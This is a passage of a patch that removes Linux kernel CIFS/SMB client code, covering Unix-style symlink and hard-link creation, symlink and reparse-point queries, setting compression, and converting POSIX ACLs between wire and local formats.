+-	if (rc == -EAGAIN)
+-		goto copyRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon,
+-		      const char *fromName, const char *toName,
+-		      const struct nls_table *nls_codepage, int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	char *data_offset;
+-	int name_len;
+-	int name_len_target;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count;
+-
+-	cifs_dbg(FYI, "In Symlink Unix style\n");
+-createSymLinkRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fromName,
+-				/* find define for this maxpathcomponent */
+-					PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fromName);
+-	}
+-	params = 6 + name_len;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (char *)pSMB + offset + 4;
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len_target =
+-		    cifsConvertToUTF16((__le16 *) data_offset, toName,
+-				/* find define for this maxpathcomponent */
+-					PATH_MAX, nls_codepage, remap);
+-		name_len_target++;	/* trailing null */
+-		name_len_target *= 2;
+-	} else {
+-		name_len_target = copy_path_name(data_offset, toName);
+-	}
+-
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max on data count below from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + name_len_target;
+-	pSMB->DataCount = cpu_to_le16(name_len_target);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_LINK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_symlinks);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in SetPathInfo create symlink = %d\n",
+-			 rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto createSymLinkRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSUnixCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const char *fromName, const char *toName,
+-		       const struct nls_table *nls_codepage, int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	char *data_offset;
+-	int name_len;
+-	int name_len_target;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count;
+-
+-	cifs_dbg(FYI, "In Create Hard link Unix style\n");
+-createHardLinkRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->FileName, toName,
+-					      PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, toName);
+-	}
+-	params = 6 + name_len;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (char *)pSMB + offset + 4;
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len_target =
+-		    cifsConvertToUTF16((__le16 *) data_offset, fromName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len_target++;	/* trailing null */
+-		name_len_target *= 2;
+-	} else {
+-		name_len_target = copy_path_name(data_offset, fromName);
+-	}
+-
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max on data count below from sess*/
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + name_len_target;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->DataCount = cpu_to_le16(name_len_target);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_HLINK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_hardlinks);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in SetPathInfo (hard link) = %d\n",
+-			 rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto createHardLinkRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const char *from_name, const char *to_name,
+-		   struct cifs_sb_info *cifs_sb)
+-{
+-	int rc = 0;
+-	NT_RENAME_REQ *pSMB = NULL;
+-	RENAME_RSP *pSMBr = NULL;
+-	int bytes_returned;
+-	int name_len, name_len2;
+-	__u16 count;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In CIFSCreateHardLink\n");
+-winCreateHardLinkRetry:
+-
+-	rc = smb_init(SMB_COM_NT_RENAME, 4, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->SearchAttributes =
+-	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM |
+-			ATTR_DIRECTORY);
+-	pSMB->Flags = cpu_to_le16(CREATE_HARD_LINK);
+-	pSMB->ClusterCount = 0;
+-
+-	pSMB->BufferFormat = 0x04;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->OldFileName, from_name,
+-				       PATH_MAX, cifs_sb->local_nls, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-
+-		/* protocol specifies ASCII buffer format (0x04) for unicode */
+-		pSMB->OldFileName[name_len] = 0x04;
+-		pSMB->OldFileName[name_len + 1] = 0x00; /* pad */
+-		name_len2 =
+-		    cifsConvertToUTF16((__le16 *)&pSMB->OldFileName[name_len+2],
+-				       to_name, PATH_MAX, cifs_sb->local_nls,
+-				       remap);
+-		name_len2 += 1 /* trailing null */  + 1 /* Signature word */ ;
+-		name_len2 *= 2;	/* convert to bytes */
+-	} else {
+-		name_len = copy_path_name(pSMB->OldFileName, from_name);
+-		pSMB->OldFileName[name_len] = 0x04;	/* 2nd buffer format */
+-		name_len2 = copy_path_name(pSMB->OldFileName+name_len+1, to_name);
+-		name_len2++;	/* signature byte */
+-	}
+-
+-	count = 1 /* string type byte */  + name_len + name_len2;
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_hardlinks);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in hard link (NT rename) = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto winCreateHardLinkRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
+-			const unsigned char *searchName, char **symlinkinfo,
+-			const struct nls_table *nls_codepage, int remap)
+-{
+-/* SMB_QUERY_FILE_UNIX_LINK */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 params, byte_count;
+-	char *data_start;
+-
+-	cifs_dbg(FYI, "In QPathSymLinkInfo (Unix) for path %s\n", searchName);
+-
+-querySymLinkRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName,
+-					   searchName, PATH_MAX, nls_codepage,
+-					   remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, searchName);
+-	}
+-
+-	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_LINK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QuerySymLinkInfo = %d\n", rc);
+-	} else {
+-		/* decode response */
+-
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		/* BB also check enough total bytes returned */
+-		if (rc || get_bcc(&pSMBr->hdr) < 2)
+-			rc = -EIO;
+-		else {
+-			bool is_unicode;
+-			u16 count = le16_to_cpu(pSMBr->t2.DataCount);
+-
+-			data_start = ((char *) &pSMBr->hdr.Protocol) +
+-					   le16_to_cpu(pSMBr->t2.DataOffset);
+-
+-			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
+-				is_unicode = true;
+-			else
+-				is_unicode = false;
+-
+-			/* BB FIXME investigate remapping reserved chars here */
+-			*symlinkinfo = cifs_strndup_from_utf16(data_start,
+-					count, is_unicode, nls_codepage);
+-			if (!*symlinkinfo)
+-				rc = -ENOMEM;
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto querySymLinkRetry;
+-	return rc;
+-}
+-
+-/*
+- *	Recent Windows versions now create symlinks more frequently
+- *	and they use the "reparse point" mechanism below.  We can of course
+- *	do symlinks nicely to Samba and other servers which support the
+- *	CIFS Unix Extensions and we can also do SFU symlinks and "client only"
+- *	"MF" symlinks optionally, but for recent Windows we really need to
+- *	reenable the code below and fix the cifs_symlink callers to handle this.
+- *	In the interim this code has been moved to its own config option so
+- *	it is not compiled in by default until callers fixed up and more tested.
+- */
+-int
+-CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
+-		    __u16 fid, char **symlinkinfo,
+-		    const struct nls_table *nls_codepage)
+-{
+-	int rc = 0;
+-	int bytes_returned;
+-	struct smb_com_transaction_ioctl_req *pSMB;
+-	struct smb_com_transaction_ioctl_rsp *pSMBr;
+-	bool is_unicode;
+-	unsigned int sub_len;
+-	char *sub_start;
+-	struct reparse_symlink_data *reparse_buf;
+-	struct reparse_posix_data *posix_buf;
+-	__u32 data_offset, data_count;
+-	char *end_of_smb;
+-
+-	cifs_dbg(FYI, "In Windows reparse style QueryLink for fid %u\n", fid);
+-	rc = smb_init(SMB_COM_NT_TRANSACT, 23, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->TotalParameterCount = 0 ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le32(2);
+-	/* BB find exact data count max from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le32(CIFSMaxBufSize & 0xFFFFFF00);
+-	pSMB->MaxSetupCount = 4;
+-	pSMB->Reserved = 0;
+-	pSMB->ParameterOffset = 0;
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 4;
+-	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_IOCTL);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->FunctionCode = cpu_to_le32(FSCTL_GET_REPARSE_POINT);
+-	pSMB->IsFsctl = 1; /* FSCTL */
+-	pSMB->IsRootFlag = 0;
+-	pSMB->Fid = fid; /* file handle always le */
+-	pSMB->ByteCount = 0;
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QueryReparseLinkInfo = %d\n", rc);
+-		goto qreparse_out;
+-	}
+-
+-	data_offset = le32_to_cpu(pSMBr->DataOffset);
+-	data_count = le32_to_cpu(pSMBr->DataCount);
+-	if (get_bcc(&pSMBr->hdr) < 2 || data_offset > 512) {
+-		/* BB also check enough total bytes returned */
+-		rc = -EIO;	/* bad smb */
+-		goto qreparse_out;
+-	}
+-	if (!data_count || (data_count > 2048)) {
+-		rc = -EIO;
+-		cifs_dbg(FYI, "Invalid return data count on get reparse info ioctl\n");
+-		goto qreparse_out;
+-	}
+-	end_of_smb = 2 + get_bcc(&pSMBr->hdr) + (char *)&pSMBr->ByteCount;
+-	reparse_buf = (struct reparse_symlink_data *)
+-				((char *)&pSMBr->hdr.Protocol + data_offset);
+-	if ((char *)reparse_buf >= end_of_smb) {
+-		rc = -EIO;
+-		goto qreparse_out;
+-	}
+-	if (reparse_buf->ReparseTag == cpu_to_le32(IO_REPARSE_TAG_NFS)) {
+-		cifs_dbg(FYI, "NFS style reparse tag\n");
+-		posix_buf =  (struct reparse_posix_data *)reparse_buf;
+-
+-		if (posix_buf->InodeType != cpu_to_le64(NFS_SPECFILE_LNK)) {
+-			cifs_dbg(FYI, "unsupported file type 0x%llx\n",
+-				 le64_to_cpu(posix_buf->InodeType));
+-			rc = -EOPNOTSUPP;
+-			goto qreparse_out;
+-		}
+-		is_unicode = true;
+-		sub_len = le16_to_cpu(reparse_buf->ReparseDataLength);
+-		if (posix_buf->PathBuffer + sub_len > end_of_smb) {
+-			cifs_dbg(FYI, "reparse buf beyond SMB\n");
+-			rc = -EIO;
+-			goto qreparse_out;
+-		}
+-		*symlinkinfo = cifs_strndup_from_utf16(posix_buf->PathBuffer,
+-				sub_len, is_unicode, nls_codepage);
+-		goto qreparse_out;
+-	} else if (reparse_buf->ReparseTag !=
+-			cpu_to_le32(IO_REPARSE_TAG_SYMLINK)) {
+-		rc = -EOPNOTSUPP;
+-		goto qreparse_out;
+-	}
+-
+-	/* Reparse tag is NTFS symlink */
+-	sub_start = le16_to_cpu(reparse_buf->SubstituteNameOffset) +
+-				reparse_buf->PathBuffer;
+-	sub_len = le16_to_cpu(reparse_buf->SubstituteNameLength);
+-	if (sub_start + sub_len > end_of_smb) {
+-		cifs_dbg(FYI, "reparse buf beyond SMB\n");
+-		rc = -EIO;
+-		goto qreparse_out;
+-	}
+-	if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
+-		is_unicode = true;
+-	else
+-		is_unicode = false;
+-
+-	/* BB FIXME investigate remapping reserved chars here */
+-	*symlinkinfo = cifs_strndup_from_utf16(sub_start, sub_len, is_unicode,
+-					       nls_codepage);
+-	if (!*symlinkinfo)
+-		rc = -ENOMEM;
+-qreparse_out:
+-	cifs_buf_release(pSMB);
+-
+-	/*
+-	 * Note: On -EAGAIN error only caller can retry on handle based calls
+-	 * since file handle passed in no longer valid.
+-	 */
+-	return rc;
+-}
+-
+-int
+-CIFSSMB_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-		    __u16 fid)
+-{
+-	int rc = 0;
+-	int bytes_returned;
+-	struct smb_com_transaction_compr_ioctl_req *pSMB;
+-	struct smb_com_transaction_ioctl_rsp *pSMBr;
+-
+-	cifs_dbg(FYI, "Set compression for %u\n", fid);
+-	rc = smb_init(SMB_COM_NT_TRANSACT, 23, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->compression_state = cpu_to_le16(COMPRESSION_FORMAT_DEFAULT);
+-
+-	pSMB->TotalParameterCount = 0;
+-	pSMB->TotalDataCount = cpu_to_le32(2);
+-	pSMB->MaxParameterCount = 0;
+-	pSMB->MaxDataCount = 0;
+-	pSMB->MaxSetupCount = 4;
+-	pSMB->Reserved = 0;
+-	pSMB->ParameterOffset = 0;
+-	pSMB->DataCount = cpu_to_le32(2);
+-	pSMB->DataOffset =
+-		cpu_to_le32(offsetof(struct smb_com_transaction_compr_ioctl_req,
+-				compression_state) - 4);  /* 84 */
+-	pSMB->SetupCount = 4;
+-	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_IOCTL);
+-	pSMB->ParameterCount = 0;
+-	pSMB->FunctionCode = cpu_to_le32(FSCTL_SET_COMPRESSION);
+-	pSMB->IsFsctl = 1; /* FSCTL */
+-	pSMB->IsRootFlag = 0;
+-	pSMB->Fid = fid; /* file handle always le */
+-	/* 3 byte pad, followed by 2 byte compress state */
+-	pSMB->ByteCount = cpu_to_le16(5);
+-	inc_rfc1001_len(pSMB, 5);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in SetCompression = %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	/*
+-	 * Note: On -EAGAIN error only caller can retry on handle based calls
+-	 * since file handle passed in no longer valid.
+-	 */
+-	return rc;
+-}
+-
+-
+-#ifdef CONFIG_CIFS_POSIX
+-
+-/*Convert an Access Control Entry from wire format to local POSIX xattr format*/
+-static void cifs_convert_ace(struct posix_acl_xattr_entry *ace,
+-			     struct cifs_posix_ace *cifs_ace)
+-{
+-	/* u8 cifs fields do not need le conversion */
+-	ace->e_perm = cpu_to_le16(cifs_ace->cifs_e_perm);
+-	ace->e_tag  = cpu_to_le16(cifs_ace->cifs_e_tag);
+-	ace->e_id   = cpu_to_le32(le64_to_cpu(cifs_ace->cifs_uid));
+-/*
+-	cifs_dbg(FYI, "perm %d tag %d id %d\n",
+-		 ace->e_perm, ace->e_tag, ace->e_id);
+-*/
+-
+-	return;
+-}
+-
+-/* Convert ACL from CIFS POSIX wire format to local Linux POSIX ACL xattr */
+-static int cifs_copy_posix_acl(char *trgt, char *src, const int buflen,
+-			       const int acl_type, const int size_of_data_area)
+-{
+-	int size =  0;
+-	int i;
+-	__u16 count;
+-	struct cifs_posix_ace *pACE;
+-	struct cifs_posix_acl *cifs_acl = (struct cifs_posix_acl *)src;
+-	struct posix_acl_xattr_header *local_acl = (void *)trgt;
+-
+-	if (le16_to_cpu(cifs_acl->version) != CIFS_ACL_VERSION)
+-		return -EOPNOTSUPP;
+-
+-	if (acl_type == ACL_TYPE_ACCESS) {
+-		count = le16_to_cpu(cifs_acl->access_entry_count);
+-		pACE = &cifs_acl->ace_array[0];
+-		size = sizeof(struct cifs_posix_acl);
+-		size += sizeof(struct cifs_posix_ace) * count;
+-		/* check if we would go beyond end of SMB */
+-		if (size_of_data_area < size) {
+-			cifs_dbg(FYI, "bad CIFS POSIX ACL size %d vs. %d\n",
+-				 size_of_data_area, size);
+-			return -EINVAL;
+-		}
+-	} else if (acl_type == ACL_TYPE_DEFAULT) {
+-		count = le16_to_cpu(cifs_acl->access_entry_count);
+-		size = sizeof(struct cifs_posix_acl);
+-		size += sizeof(struct cifs_posix_ace) * count;
+-/* skip past access ACEs to get to default ACEs */
+-		pACE = &cifs_acl->ace_array[count];
+-		count = le16_to_cpu(cifs_acl->default_entry_count);
+-		size += sizeof(struct cifs_posix_ace) * count;
+-		/* check if we would go beyond end of SMB */
+-		if (size_of_data_area < size)
+-			return -EINVAL;
+-	} else {
+-		/* illegal type */
+-		return -EINVAL;
+-	}
+-
+-	size = posix_acl_xattr_size(count);
+-	if ((buflen == 0) || (local_acl == NULL)) {
+-		/* used to query ACL EA size */
+-	} else if (size > buflen) {
+-		return -ERANGE;
+-	} else /* buffer big enough */ {
+-		struct posix_acl_xattr_entry *ace = (void *)(local_acl + 1);
+-
+-		local_acl->a_version = cpu_to_le32(POSIX_ACL_XATTR_VERSION);
+-		for (i = 0; i < count ; i++) {
+-			cifs_convert_ace(&ace[i], pACE);
+-			pACE++;
+-		}
+-	}
+-	return size;
+-}
+-
+-static void convert_ace_to_cifs_ace(struct cifs_posix_ace *cifs_ace,
+-				     const struct posix_acl_xattr_entry *local_ace)
+-{
+-	cifs_ace->cifs_e_perm = le16_to_cpu(local_ace->e_perm);
+-	cifs_ace->cifs_e_tag =  le16_to_cpu(local_ace->e_tag);
+-	/* BB is there a better way to handle the large uid? */
+-	if (local_ace->e_id == cpu_to_le32(-1)) {
+-	/* Probably no need to le convert -1 on any arch but can not hurt */
+-		cifs_ace->cifs_uid = cpu_to_le64(-1);
+-	} else
+-		cifs_ace->cifs_uid = cpu_to_le64(le32_to_cpu(local_ace->e_id));
+-/*
+-	cifs_dbg(FYI, "perm %d tag %d id %d\n",
+-		 ace->e_perm, ace->e_tag, ace->e_id);
+-*/
+-}
+-
+-/* Convert ACL from local Linux POSIX xattr to CIFS POSIX ACL wire format */
+-static __u16 ACL_to_cifs_posix(char *parm_data, const char *pACL,
+-			       const int buflen, const int acl_type)
+-{
+-	__u16 rc = 0;
+-	struct cifs_posix_acl *cifs_acl = (struct cifs_posix_acl *)parm_data;
+-	struct posix_acl_xattr_header *local_acl = (void *)pACL;
+-	struct posix_acl_xattr_entry *ace = (void *)(local_acl + 1);
+-	int count;
+-	int i;
+-
+-	if ((buflen == 0) || (pACL == NULL) || (cifs_acl == NULL))
+-		return 0;
+-
+-	count = posix_acl_xattr_count((size_t)buflen);
+-	cifs_dbg(FYI, "setting acl with %d entries from buf of length %d and version of %d\n",
+-		 count, buflen, le32_to_cpu(local_acl->a_version));
+-	if (le32_to_cpu(local_acl->a_version) != 2) {
+-		cifs_dbg(FYI, "unknown POSIX ACL version %d\n",
+-			 le32_to_cpu(local_acl->a_version));
+-		return 0;
+-	}
+-	cifs_acl->version = cpu_to_le16(1);
+-	if (acl_type == ACL_TYPE_ACCESS) {
+-		cifs_acl->access_entry_count = cpu_to_le16(count);
+-		cifs_acl->default_entry_count = cpu_to_le16(0xFFFF);
+-	} else if (acl_type == ACL_TYPE_DEFAULT) {
+-		cifs_acl->default_entry_count = cpu_to_le16(count);
+-		cifs_acl->access_entry_count = cpu_to_le16(0xFFFF);
+-	} else {
+-		cifs_dbg(FYI, "unknown ACL type %d\n", acl_type);
+-		return 0;
+-	}
+-	for (i = 0; i < count; i++)
+-		convert_ace_to_cifs_ace(&cifs_acl->ace_array[i], &ace[i]);
+-	if (rc == 0) {
+-		rc = (__u16)(count * sizeof(struct cifs_posix_ace));
+-		rc += sizeof(struct cifs_posix_acl);
+-		/* BB add check to make sure ACL does not overflow SMB */
+-	}
+-	return rc;
+-}
+-
+-int
+-CIFSSMBGetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const unsigned char *searchName,
+-		   char *acl_inf, const int buflen, const int acl_type,
+-		   const struct nls_table *nls_codepage, int remap)
+-{
+-/* SMB_QUERY_POSIX_ACL */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In GetPosixACL (Unix) for path %s\n", searchName);
+-
+-queryAclRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		(void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName,
+-					   searchName, PATH_MAX, nls_codepage,
+-					   remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-		pSMB->FileName[name_len] = 0;
+-		pSMB->FileName[name_len+1] = 0;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, searchName);
+-	}
+-
+-	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(
+-		offsetof(struct smb_com_transaction2_qpi_req,
+-			 InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_POSIX_ACL);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_acl_get);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in Query POSIX ACL = %d\n", rc);
+-	} else {
+-		/* decode response */
+-
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		/* BB also check enough total bytes returned */
+-		if (rc || get_bcc(&pSMBr->hdr) < 2)
+-			rc = -EIO;      /* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
+-			rc = cifs_copy_posix_acl(acl_inf,
+-				(char *)&pSMBr->hdr.Protocol+data_offset,
+-				buflen, acl_type, count);
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto queryAclRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const unsigned char *fileName,
+-		   const char *local_acl, const int buflen,
+-		   const int acl_type,
+-		   const struct nls_table *nls_codepage, int remap)
+-{
+-	struct smb_com_transaction2_spi_req *pSMB = NULL;
+-	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
+-	char *parm_data;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count, data_count, param_offset, offset;
+-
+-	cifs_dbg(FYI, "In SetPosixACL (Unix) for path %s\n", fileName);
+-setAclRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
